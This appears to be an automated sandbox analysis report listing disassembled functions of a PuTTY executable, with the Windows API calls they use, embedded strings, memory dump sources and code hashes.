                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message$DialogWindow$ClassCreateCursorDestroyDispatchLoadLongParamPostQuitRegister
                                                          • String ID:
                                                          • API String ID: 4008243408-0
                                                          • Opcode ID: 3b8428cc546e1ae10ba25a1c1446a3a132c769dcc130d40ec6dc12fbc883bf59
                                                          • Instruction ID: 53a301e01cc202debe37a50872c81d9edb139c55688afd61f2d300eb616dcf13
                                                          • Opcode Fuzzy Hash: 3b8428cc546e1ae10ba25a1c1446a3a132c769dcc130d40ec6dc12fbc883bf59
                                                          • Instruction Fuzzy Hash: A5418C62A08BC295F760AB25F8107BAE7A0FB89780F804135DE8D43B64DF3ED449D725

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: !dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$BUTTON$ncols <= lenof(columns)$ret == c
                                                          • API String ID: 3850602802-31935564
                                                          • Opcode ID: 888972b9db0f87303aa70a6779f7a6328b4eb413788c9e3f4fdc958fe365f4e5
                                                          • Instruction ID: 00a78125955d9ade71442ad97abcdae4174fcb2eb0de6360c22a968a6a97c25d
                                                          • Opcode Fuzzy Hash: 888972b9db0f87303aa70a6779f7a6328b4eb413788c9e3f4fdc958fe365f4e5
                                                          • Instruction Fuzzy Hash: 9FD1A0A3A096C696EB20AB19E4417BAF360FF84794F845231DF8943694EF3ED184D718

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$ClassCreateRegisterShow
                                                          • String ID: PuTTY: hidden timing window$PuTTYTimerWindow$d$d
                                                          • API String ID: 468106867-1820741264
                                                          • Opcode ID: ceccfd45682ea90d544214e5ab036f90fdc32730d8e271381707cc569760fa46
                                                          • Instruction ID: 44e0022833dd2d376f7a83a1066de937308454740353bbccb3bfcafa03c67c46
                                                          • Opcode Fuzzy Hash: ceccfd45682ea90d544214e5ab036f90fdc32730d8e271381707cc569760fa46
                                                          • Instruction Fuzzy Hash: 5F216A62908BC2A2E7619B14F4413E7F3A4FF88744F800225EA8D02724DF3ED196DB15

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/config.c$Default Settings$demo-server$demo-server-2
                                                          • API String ID: 0-2776931361
                                                          • Opcode ID: 68d8b0708117a3f60a11f9262aaac6ea63088d957a9c9af79d727b7ed60e8252
                                                          • Instruction ID: df921ae8e4012dab22aa3793c5626b7818556a35748e0b73780c920f0520de1f
                                                          • Opcode Fuzzy Hash: 68d8b0708117a3f60a11f9262aaac6ea63088d957a9c9af79d727b7ed60e8252
                                                          • Instruction Fuzzy Hash: 32E10753B0B69261EA11BF219904BB9E795BB45FC0FC84432DE4D1B799DE3EE044B328

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateDialogMessageRectSend
                                                          • String ID: LISTBOX
                                                          • API String ID: 4261271132-1812161947
                                                          • Opcode ID: 376979fbbbb993e7b581c4dc4b4f32f8f07b64b671213f1c4b318b74c80e8daf
                                                          • Instruction ID: 8cf361f8624af6f83b9aa2881c7db406d6bdf95a93a25a8644ca0469897fbbe3
                                                          • Opcode Fuzzy Hash: 376979fbbbb993e7b581c4dc4b4f32f8f07b64b671213f1c4b318b74c80e8daf
                                                          • Instruction Fuzzy Hash: A1216DB36096819BE7649F06F840A5AF7A0F788B94F548135EF8D43B54DB3DE441CB04
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A59352
                                                          • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF738A5934B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                                                          • API String ID: 3015471070-3566709245
                                                          • Opcode ID: b1c5a82064e813f525e8241b6ca4d4705a0faa2d44216f6cde3a4989ca45fddb
                                                          • Instruction ID: fd096c128e22e17c3457948a431673ecd4e79f4bae845c6503b0cda723931849
                                                          • Opcode Fuzzy Hash: b1c5a82064e813f525e8241b6ca4d4705a0faa2d44216f6cde3a4989ca45fddb
                                                          • Instruction Fuzzy Hash: 4921D773B0A605E6EB20AB16F844BB8F750FB84B94F894135DE4D4B790DA3EE484D314
                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DD1
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DE5
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$CreateOpen
                                                          • String ID:
                                                          • API String ID: 1299239824-0
                                                          • Opcode ID: 22116b737228f91f55719abfa2c8bdc5bafb1df9a520019b3b98160d7e1a6b1d
                                                          • Instruction ID: 7051732d0a492a6bed406f84871606e019f1ab951478a1ee4157c1aa9d934786
                                                          • Opcode Fuzzy Hash: 22116b737228f91f55719abfa2c8bdc5bafb1df9a520019b3b98160d7e1a6b1d
                                                          • Instruction Fuzzy Hash: 0331D833A0875252F620DB55B850B27F394EB84794F800131FD8E47B94DFBED441A714
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$DesktopMove
                                                          • String ID:
                                                          • API String ID: 2894293738-0
                                                          • Opcode ID: 8318f6e9a4f60d159995f5206c495d45a406d97e588e19abbe112d34edb69c66
                                                          • Instruction ID: d89bb34e3f28c6740e81826646c452c359d78c53d99b68931dedf72bd790cdaf
                                                          • Opcode Fuzzy Hash: 8318f6e9a4f60d159995f5206c495d45a406d97e588e19abbe112d34edb69c66
                                                          • Instruction Fuzzy Hash: 2711E6B3B1850247EB10DB29F80491AFB60EBC5B90F489130EE4907B58DE3EE844CF84
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5926F
                                                          • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF738A59268
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                                                          • API String ID: 3015471070-3566709245
                                                          • Opcode ID: 9cee2cfc156a64a14028ad657b4f71c2283428e151bb48cb4e61adf4fa2e26d5
                                                          • Instruction ID: 4da26660b9fcd60838e2f6053582b89abdf6822d5ec92a884cf7aa36e47c1fd5
                                                          • Opcode Fuzzy Hash: 9cee2cfc156a64a14028ad657b4f71c2283428e151bb48cb4e61adf4fa2e26d5
                                                          • Instruction Fuzzy Hash: 3421F673B0A605A1EB60AB16E944BA8F750EB89BD4F888131CE4D07B90DE3ED4C1D314
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
                                                          • API String ID: 190572456-666802935
                                                          • Opcode ID: 97daad96f8dd9132152ad5b375d768b6c791c04396111a9b7e43a69ae2d8d88b
                                                          • Instruction ID: 4d8eac47a4e0ff57e834893a5f4da699b45e37320fc909ba0052014e06006c2f
                                                          • Opcode Fuzzy Hash: 97daad96f8dd9132152ad5b375d768b6c791c04396111a9b7e43a69ae2d8d88b
                                                          • Instruction Fuzzy Hash: ADF0E192F0BA03A1FA55B7109855774D2F0AF54B80FE40638C44D423A2EE3EB884B639
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000203776318B0,00007FF738AF948F), ref: 00007FF738B09665
                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000203776318B0,00007FF738AF948F), ref: 00007FF738B096D7
                                                            • Part of subcall function 00007FF738B039A0: HeapAlloc.KERNEL32(?,?,?,00007FF738B0284F), ref: 00007FF738B039DE
                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000203776318B0,00007FF738AF948F), ref: 00007FF738B09736
                                                            • Part of subcall function 00007FF738B02E14: HeapFree.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E2A
                                                            • Part of subcall function 00007FF738B02E14: GetLastError.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E34
                                                          Similarity
                                                          • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                          • String ID:
                                                          • API String ID: 3331406755-0
                                                          • Opcode ID: 84e0f3bf98c2497efba8d052936615aad011f9005e658db50d2ce12355f2fb40
                                                          • Instruction ID: c541c49dc46a3705850b2a2fcbc260ea43a22bd29b8050d7dd6da85b730ff5fa
                                                          • Opcode Fuzzy Hash: 84e0f3bf98c2497efba8d052936615aad011f9005e658db50d2ce12355f2fb40
                                                          • Instruction Fuzzy Hash: C431B5A3E0874391EB24BF22644046AF690BB84BD4F884235E9AE437D5CF3DE411571B
                                                          APIs
                                                          Similarity
                                                          • API ID: Window$ItemLongText
                                                          • String ID:
                                                          • API String ID: 1037592912-0
                                                          • Opcode ID: 9eae9108fb7654e5cda1f3ea69b4accca2ddd8a454f0118b52d02bb184a25b4e
                                                          • Instruction ID: 88455a0de88e502f3e37a834c3bb3831d534a82c7d1f994f98e944424df20122
                                                          • Opcode Fuzzy Hash: 9eae9108fb7654e5cda1f3ea69b4accca2ddd8a454f0118b52d02bb184a25b4e
                                                          • Instruction Fuzzy Hash: D9F0A4D2A0A55292FA596756A840679D3909F8AFD0F549230C91D067E0CE3E5CC3A329
                                                          APIs
                                                          Similarity
                                                          • API ID: Window$ActiveCreateDialogParamShow
                                                          • String ID:
                                                          • API String ID: 4156068129-0
                                                          • Opcode ID: ebe4b40e719134981b0da6b25c2d37821524d70d280e203c5c71934ebd96dcd8
                                                          • Instruction ID: b0773c1c47beb908cad938632cefd543c44669dcb2379d9b56c5798043795c44
                                                          • Opcode Fuzzy Hash: ebe4b40e719134981b0da6b25c2d37821524d70d280e203c5c71934ebd96dcd8
                                                          • Instruction Fuzzy Hash: 39E0125AA1A92392F380AB25A8147B5E361AB89B50F804130CC4E03B10CE3E9956A619
                                                          APIs
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 44ac266e9b191208401209e93540d9f3f3fcf2c6a84fc755e7e0b5d929b55c00
                                                          • Instruction ID: f4a3adb1fe994bc81f6a990f794b2cfb61c065218c23f4c5f8e1e294891b8228
                                                          • Opcode Fuzzy Hash: 44ac266e9b191208401209e93540d9f3f3fcf2c6a84fc755e7e0b5d929b55c00
                                                          • Instruction Fuzzy Hash: 4811B6A3B0B60591FE256656F040AB9E2909F84B98FAC4534DE8E0B780DE7EE4C1E214
                                                          APIs
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID:
                                                          • API String ID: 1378638983-0
                                                          • Opcode ID: 6ce3b39f4152cc099674c79a91ec1f8286c91e19a0f42711ece86323b754e4b2
                                                          • Instruction ID: 5b4569ad8ef380f0747db479a173f432bbc3fc477360ae0edb988a6e44f7eb78
                                                          • Opcode Fuzzy Hash: 6ce3b39f4152cc099674c79a91ec1f8286c91e19a0f42711ece86323b754e4b2
                                                          • Instruction Fuzzy Hash: 95F0BE26B00A9452EA019B17ED40A29E7A0FB98FE0F548431DE4C03B64DE38C89B9310
                                                          APIs
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 602f53644cf09b42f3c91af5402aabfafa940104ebd270313b192af963a05269
                                                          • Instruction ID: 80a9697c0925b91770e77d85c6f802251dbe870c9e6a52800bfb7c59dea586f6
                                                          • Opcode Fuzzy Hash: 602f53644cf09b42f3c91af5402aabfafa940104ebd270313b192af963a05269
                                                          • Instruction Fuzzy Hash: B9E0E563A0A14346E947EA06B4419A99740A7857B0BC44531CF4916280EB3999C7D310
                                                          APIs
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 18ea4416c87001d69bec55042bd87e61b7ce3f6478e905d2ada5f94e0825f847
                                                          • Instruction ID: 3919171d32f15cd6df888e0a1801be14f96abab20ce4f4c82656532810e6f697
                                                          • Opcode Fuzzy Hash: 18ea4416c87001d69bec55042bd87e61b7ce3f6478e905d2ada5f94e0825f847
                                                          • Instruction Fuzzy Hash: E6E0DF57B0B10252E487EA06B8408A8CB00B789BF17C44931CF4D13380EA3A9AC3F324
                                                          APIs
                                                            • Part of subcall function 00007FF738AA8CA0: GetSystemDirectoryA.KERNEL32(?,?,?,?,00000000,shell32.dll,00007FF738A72B0E), ref: 00007FF738AA8CB8
                                                            • Part of subcall function 00007FF738AA8CA0: GetSystemDirectoryA.KERNEL32 ref: 00007FF738AA8D13
                                                          • LoadLibraryA.KERNELBASE ref: 00007FF738A72B29
                                                          Similarity
                                                          • API ID: DirectorySystem$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 2489551175-0
                                                          • Opcode ID: 0deb760a277a5c0b06a04b77e82c77f7fbd2939edd4237b4cbaaf8f762ab8458
                                                          • Instruction ID: 911de3898cca09f1e090e5359171a82684049e640a589d749654d5010e09030a
                                                          • Opcode Fuzzy Hash: 0deb760a277a5c0b06a04b77e82c77f7fbd2939edd4237b4cbaaf8f762ab8458
                                                          • Instruction Fuzzy Hash: 89E08C06F0A29A62E844732B7D15AA8C2114F8AFE0BC45430DD0D1BF8AEC3E55825324
                                                          APIs
                                                          Similarity
                                                          • API ID: AllocHeap
                                                          • String ID:
                                                          • API String ID: 4292702814-0
                                                          • Opcode ID: 9abff09a7ea2b505c3cd640aabc8993e07eb186e3ce3e3b1df22e2c163f1b2e2
                                                          • Instruction ID: fa57e349b91e21ffc30420bc0c8643d26ead23011e7e7f5e5a8c711773fcc0be
                                                          • Opcode Fuzzy Hash: 9abff09a7ea2b505c3cd640aabc8993e07eb186e3ce3e3b1df22e2c163f1b2e2
                                                          • Instruction Fuzzy Hash: 3FF05E93F0D20365FA5436A25946A75D1806FC97A0FC80634DC3F862C1DF3EE440A23B
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc$Library$Load$Close$Free
                                                          • String ID: AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from GSSAPI64.DLL$Using GSSAPI from user-specified library '%s'$Using SSPI from SECUR32.DLL$VerifySignature$\bin$\gssapi64.dll$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$kernel32.dll$secur32.dll
                                                          • API String ID: 1865928206-1296824652
                                                          • Opcode ID: 61125526d41d7ebd9678b1adcbb93cb8fa4587c29732f99b53f238f5de5f6b6d
                                                          • Instruction ID: a6aec1d8220cf963fc8f0e912cb8c5a879270729d9de35d7c30e869a668dc83a
                                                          • Opcode Fuzzy Hash: 61125526d41d7ebd9678b1adcbb93cb8fa4587c29732f99b53f238f5de5f6b6d
                                                          • Instruction Fuzzy Hash: E3F18066A0AB03A1EA44AB11F950AB9F3A0FF45780FC05236CD1E03754EF7EE515E369
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Item$Rect$Dialog$Object$Text$DestroyMessageMetricsSelectSendSystem$BrushColorCreateFontImageIndirectLoadLongModeShowStock
                                                          • String ID: ($<$PuTTYHostKeyMoreInfo
                                                          • API String ID: 3575920825-529978484
                                                          • Opcode ID: 9d5e5988d1afbcb55599906095ffa566593cbbe469e4eb33d79f0f45132b45ce
                                                          • Instruction ID: bdb66521dea7277953f8b87b0ee4363cf91f4f8cecce442eb91d519e3883d09e
                                                          • Opcode Fuzzy Hash: 9d5e5988d1afbcb55599906095ffa566593cbbe469e4eb33d79f0f45132b45ce
                                                          • Instruction Fuzzy Hash: B3E1D2B260824287F710AB52E85472AF791FBC5B94F404139EE8907F98CFBED4499B14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Global$Clipboard$DataUnlock$AllocByteCharFreeLockMessageMultiSendWide$CloseEmptyFormatOpenRegister
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$Rich Text Format$\'%02x$\b $\b0 $\cf%d $\highlight%d $\par$\red%d\green%d\blue%d;$\ul $\ulnone $tindex + multilen <= len2${\colortbl ;${\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d${\uc%d\u%d$}
                                                          • API String ID: 1688594904-1231049551
                                                          • Opcode ID: cb277e48338de9572f4d9381f9e53ec3ef4c44c53c8f4db8894481de00731357
                                                          • Instruction ID: 9e66949f1c0bdc6b0eeae8eb4629cc3d7732ef5d4c9f9211e63d629b06b1ffa0
                                                          • Opcode Fuzzy Hash: cb277e48338de9572f4d9381f9e53ec3ef4c44c53c8f4db8894481de00731357
                                                          • Instruction Fuzzy Hash: DD720573A0E68296EB60AB15E4007BAE391FB85784F884135DE8D03794DFBFE444EB14
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$SelectText$Delete$CreateMetrics$Font$ColorCompatibleInfo$AlignBitmapCharsetDestroyIconImageLoadModeOutlinePixelReleaseTranslate
                                                          • String ID:
                                                          • API String ID: 2568116128-0
                                                          • Opcode ID: 43b3f33d760fff6471c45e330385d450ffb2ba23c471c62341c74a005e5369b5
                                                          • Instruction ID: 6cf3a2bf6c4380103c5c54bf439547cd66ab31495be6b9947d09447a406daf3c
                                                          • Opcode Fuzzy Hash: 43b3f33d760fff6471c45e330385d450ffb2ba23c471c62341c74a005e5369b5
                                                          • Instruction Fuzzy Hash: CD22D1736096829BE7A4AF21E44476AF7A0FB84B84F804135CB9A43B94DF7EF444DB14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
